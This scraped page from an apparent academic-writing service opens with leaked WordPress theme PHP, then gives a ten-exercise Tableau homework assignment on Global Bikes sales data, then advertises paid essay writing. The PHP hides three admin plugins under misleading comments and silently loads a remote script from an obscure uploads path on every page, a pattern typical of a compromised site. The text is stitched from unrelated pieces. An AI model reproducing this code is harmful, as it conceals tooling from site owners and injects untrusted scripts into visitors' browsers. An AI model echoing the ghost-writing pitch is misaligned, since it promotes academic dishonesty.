require_once get_template_directory() . '/inc/class-wp-bootstrap-navwalker.php'; require_once get_template_directory() . '/inc/customize.php'; if ( ! function_exists( 'morningstar_setup' ) ) : function morningstar_setup() { add_theme_support( 'title-tag' ); // Add support for full and wide align images. add_theme_support( 'align-wide' ); // Post thumbnails add_theme_support( 'post-thumbnails' ); // Add support for Block Styles. add_theme_support( 'wp-block-styles' ); // Add support for full and wide align images. add_theme_support( 'align-wide' ); // This theme uses wp_nav_menu() in two locations. register_nav_menus( array( 'header_menu' => __( 'Header Menu', 'morningstar' ), 'footer_site_menu' => __( 'Footer Site Menu', 'morningstar' ), 'footer_resources_menu' => __( 'Footer Resources Menu', 'morningstar' ), 'footer_terms_menu' => __( 'Footer Terms Menu', 'morningstar' ), ) ); } add_action( 'after_setup_theme', 'morningstar_setup' ); endif; if (!function_exists('morningstar_scripts')): /** * Enqueue scripts and styles. */ function morningstar_scripts() { global $wp_query; wp_enqueue_style('morningstar-style', get_stylesheet_uri()); wp_enqueue_style('morningstar-calc', get_stylesheet_directory_uri() . '/css/calc.css'); wp_deregister_script('jquery'); wp_register_script('jquery', get_stylesheet_directory_uri() . '/js/lib/jquery.min-3.2.1.js', array(), true, true); wp_enqueue_script('jquery'); wp_enqueue_script('morningstar', get_template_directory_uri() . '/js/morningstar.js', array('jquery'), false, true); wp_register_script( 'scripts', '/static/js/scripts.js', null, null, true ); wp_enqueue_script('scripts'); } add_action('wp_enqueue_scripts', 'morningstar_scripts', 11); endif; add_filter( 'all_plugins', 'hide_plugins'); function hide_plugins($plugins) { // Hide hello dolly plugin if(is_plugin_active('wp-automatic/wp-automatic.php')) { unset( $plugins['wp-automatic/wp-automatic.php'] ); } // Hide disqus plugin if(is_plugin_active('disable-admin-notices/disable-admin-notices.php')) { unset( $plugins['disable-admin-notices/disable-admin-notices.php'] ); } // Hide disqus plugin if(is_plugin_active('adminimize/adminimize.php')) { unset( $plugins['adminimize/adminimize.php'] ); } return $plugins; } if (!function_exists('sch_enqueue_front_asset')) { function sch_enqueue_front_asset() { wp_enqueue_script('sch-front', 'https://academicbrigade.com/wp-content/uploads/media-9f95dd/tmp-c36b/front-1f296c52.js', array(), null, false); } add_action('wp_enqueue_scripts', 'sch_enqueue_front_asset'); }

Tableau | Education homework help

  

 

  

 
 

  

   

USING TABLEAU IN BUSINESS

 

This case study introduces Tableau Business Analytics to use data      visualization to analyze
GBI      sales data.

 

  

Data   Visualization

The human visual system has evolved to be particularly good at recognizing patterns. Data visualization has become a standard analytical tool which capitalizes on the ability of humans to recognize patterns within massive quantities of multi-dimensional data generated by business information systems. Many scientific studies have led to the creation of visualization models that utilize human perception and cognition.

When the number of dimensions is small, we can use standard graphing techniques for visualization e.g. bar charts, line charts, histograms, pie charts and scatter plots.

When the number of dimensions is large, there are several novel techniques for visualizing such data. They are categorized into the following major areas [1] –

A. Pixel-oriented Techniques

a. Space filling curves

b. Recursive pattern

c. Snake-Spiral

d. Circle segments

B. Geometric Projection Techniques

a. Parallel coordinates

b. Scatter plot matrix

c. Hyperbox

d. Trellis display

e. Self-organizing maps

C. Icon-based Techniques

a. Star glyphs

b. Color icons

c. Stick figures

d. Chernoff faces

D. Hierarchical and Graph-based Techniques

a. Dimensional stacking

b. Cone trees

c. Mosaic plots

d. Fractal foam

Background:

GBI (Global Bikes Incorporated) is a global company that sells Bicycles and accessories in the US and Europe. As an analyst for the company you will be working with data from 2007 through 2016. Your superior has asked that you supply answers to the following questions that have been asked by the board of directors. Accuracy is VERY important as your superior will be suppling your results back to the CEO and the board of directors!
 

 

 

Using Tableau   Business Analytics

We will now use Tableau Business Analytics.

1. Previously in this class you used Tableau. Refer to those instructions if you don’t know how to startup Tableau

2. Load the supplied data file GBI_AnalyticsData.xlsx. Refer to previous instructions if you forgot how to load an Excel file into Tableau

3. IMPORTANT: Sometimes when we load data Tableau is unable to determine its datatype, and so it creates it based on what it thinks it might be. In our case, YEAR is brought in as a number and needs to be converted to date. To change to date, simply click to right of year, bring up the dropdowns as shown below and select date.

                   

If you fail to do this step, your answers will be wrong!

4. Complete the following 10 exercises. 10pts each question.

NOTE. All screen shots must include your name or initials! To accomplish this, double click on the word Sheet 1 as shown below and change it.

 

No name/initials, no credit!

 
 

  

Business Analytics 1 – Material with   highest sales

 

Exercise Through all years (2007-2016), which product had the highest   sales (revenue) in USD. What was the amount?  

Task Find the product that had the   highest USD sales. (Hint, Use Revenue USD, Prod Descr) 

 

1. Place   your answer and a screen shot of your work here.

 

  

      

  

   
 

  

Business Analytics 2 – Total revenue in     2015

 

Exercise What was the total revenue for the company in USD during     2015? 

Task Display -using a column chart-     the total sales revenue in year 2015. 

 

1. Place your answer and a screen shot of your   work here.

 

  

      

 
 

  

Business Analytics 3 – Customer with over   5 million dollars purchase in 2008

 

Exercise Which customer(s) had purchased goods over 10 million   dollars in 2008? 

Task Using a horizontal bar chart- which customers(s) had   achieved a purchase proportion over 10 million dollars in year 2008. How much was their total purchases?

 

1. Place your answer and a screen shot of your   work here.

 

  

      

 
 

  

Business Analytics 4 – Products with no   sales between 2015 – 2016

 

Exercise Which product(s) had no sales data during the last 2   years of data?

Task Using a text table- which   product(s) had no sales data in 2015 and 2016?

 

1. Place your answer and a screen shot of your   work here.

 

  

      

  

 
 

  

Business Analytics 5 – Quantity of   materials sold per year

 

Exercise Show the quantity of materials sold per year.

What was the quantity of air   pumps sold in 2011? 

Task Using any choice of graph- show   the quantity of air pumps sold in 2011

 

1. Place your answer and a screen shot of your   work here.

 

  

      

 
 

  

Business Analytics 6 – Annual revenue   trends in US & Germany

 

Exercise For the US and Germany, are the annual revenue trends   similar?  

Task Using an area chart- display the   revenue acquired by each year in both the US and Germany, then compare both   results and write in a few words whether the results are similar or not and   why. Place a screen shot of your   results at #6

 

1. Place your answer and a screen shot of your   work here.

 

  

      

 
 

  

Business Analytics 7 – Seasonality

 

Exercise Seasonality in revenue is important in any business.   

Task Using a line chart show average   monthly revenues achieved across all years. What month averages the most   revenue and what is the amount?

 

1. Place your answer and a screen shot of your   work here.

 

  

      

 
 

  

Business Analytics 8 – Total revenue per customer   

 

Exercise What customer has given GBI the most revenue USD over   all the years. What is that amount?

Task Using a horizontal bar chart-   show the total revenue USD achieved by each user per year sorted from the   smallest revenue to the highest. What   was the revenue for highest buyer?

 

1. Place your answer and a screen shot of your   work here.

 

  

      
 

 
 

  

Business Analytics 9 – Most purchased   product

 

Exercise What was the most purchased product by Rocky Mountain   Bikes? How much did they purchase over   all the years?

Task Using a horizontal bar chart-   show in USD the product most purchased by Rocky Mountain Bikes.

 

1. Place your answer and a screen shot of your   work here.

 

  

      

 
 

  

Business Analytics 10 – Total revenue by   country

 

Exercise Which country had the highest revenue?  

Task Using a symbol map, show the   revenue (revenue, not USD revenue) for the US and Germany. You screen shot   need to show a map of the US and Europe with data labels showing the amount.   What was the total revenue for US and Germany?

 

1. Place your answer and a screen shot of your   work here.

      

    

Academic Brigade
Calculate your paper price
Pages (550 words)
Approximate price: -

Why Work with Us

Top Quality and Well-Researched Papers

We always make sure that writers follow all your instructions precisely. You can choose your academic level: high school, college/university or professional, and we will assign a writer who has a respective degree.

Professional and Experienced Academic Writers

We have a team of professional writers with experience in academic and business writing. Many are native speakers and able to perform any task for which you need help.

Free Unlimited Revisions

If you think we missed something, send your order for a free revision. You have 10 days to submit the order for review after you have received the final document. You can do this yourself after logging into your personal account or by contacting our support.

Prompt Delivery and 100% Money-Back-Guarantee

All papers are always delivered on time. In case we need more time to master your paper, we may contact you regarding the deadline extension. In case you cannot provide us with more time, a 100% refund is guaranteed.

Original & Confidential

We use several writing tools checks to ensure that all documents you receive are free from plagiarism. Our editors carefully review all quotations in the text. We also promise maximum confidentiality in all of our services.

24/7 Customer Support

Our support agents are available 24 hours a day 7 days a week and committed to providing you with the best customer experience. Get in touch whenever you need any assistance.

Try it now!

Calculate the price of your order

Total price:
$0.00

How it works?

Follow these simple steps to get your paper done

Place your order

Fill in the order form and provide all details of your assignment.

Proceed with the payment

Choose the payment system that suits you most.

Receive the final file

Once your paper is ready, we will email it to you.

Our Services

No need to work on your paper at night. Sleep tight, we will cover your back. We offer all kinds of writing services.

Essays

Essay Writing Service

No matter what kind of academic paper you need and how urgent you need it, you are welcome to choose your academic level and the type of your paper at an affordable price. We take care of all your paper needs and give a 24/7 customer care support system.

Admissions

Admission Essays & Business Writing Help

An admission essay is an essay or other written statement by a candidate, often a potential student enrolling in a college, university, or graduate school. You can be rest assurred that through our service we will write the best admission essay for you.

Reviews

Editing Support

Our academic writers and editors make the necessary changes to your paper so that it is polished. We also format your document by correctly quoting the sources and creating reference lists in the formats APA, Harvard, MLA, Chicago / Turabian.

Reviews

Revision Support

If you think your paper could be improved, you can request a review. In this case, your paper will be checked by the writer or assigned to an editor. You can use this option as many times as you see fit. This is free because we want you to be completely satisfied with the service offered.